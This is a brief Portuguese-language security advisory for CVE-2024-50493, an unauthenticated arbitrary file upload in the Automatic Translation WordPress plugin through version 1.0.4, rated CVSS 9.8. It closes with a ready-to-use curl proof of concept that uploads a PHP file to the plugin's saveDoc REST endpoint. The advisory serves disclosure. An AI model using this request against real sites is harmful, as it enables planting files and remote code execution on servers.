
Tradução Automática <= 1.0.4 - Upload Arbitrário de Arquivo Não Autenticado
Automatic Translation <= 1.0.4 - Upload de Arquivo Arbitrário Não Autenticado
O plugin Automatic Translation para WordPress é vulnerável a uploads de arquivos arbitrários devido à falta de validação de tipo de arquivo em todas as versões até e incluindo a 1.0.4. Isso possibilita que atacantes não autenticados façam upload de arquivos arbitrários no servidor do site afetado, o que pode permitir a execução remota de código.
CVE: CVE-2024-50493
CVSS: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CVSS Score: 9.8
Slugs: automatic-translation
curl -X POST \
-F "file_name=info.php" \
-F "file_url=@/tmp/info.php" \
"http://kubernetes.docker.internal/wp-json/automatic-translator/v1/saveDoc"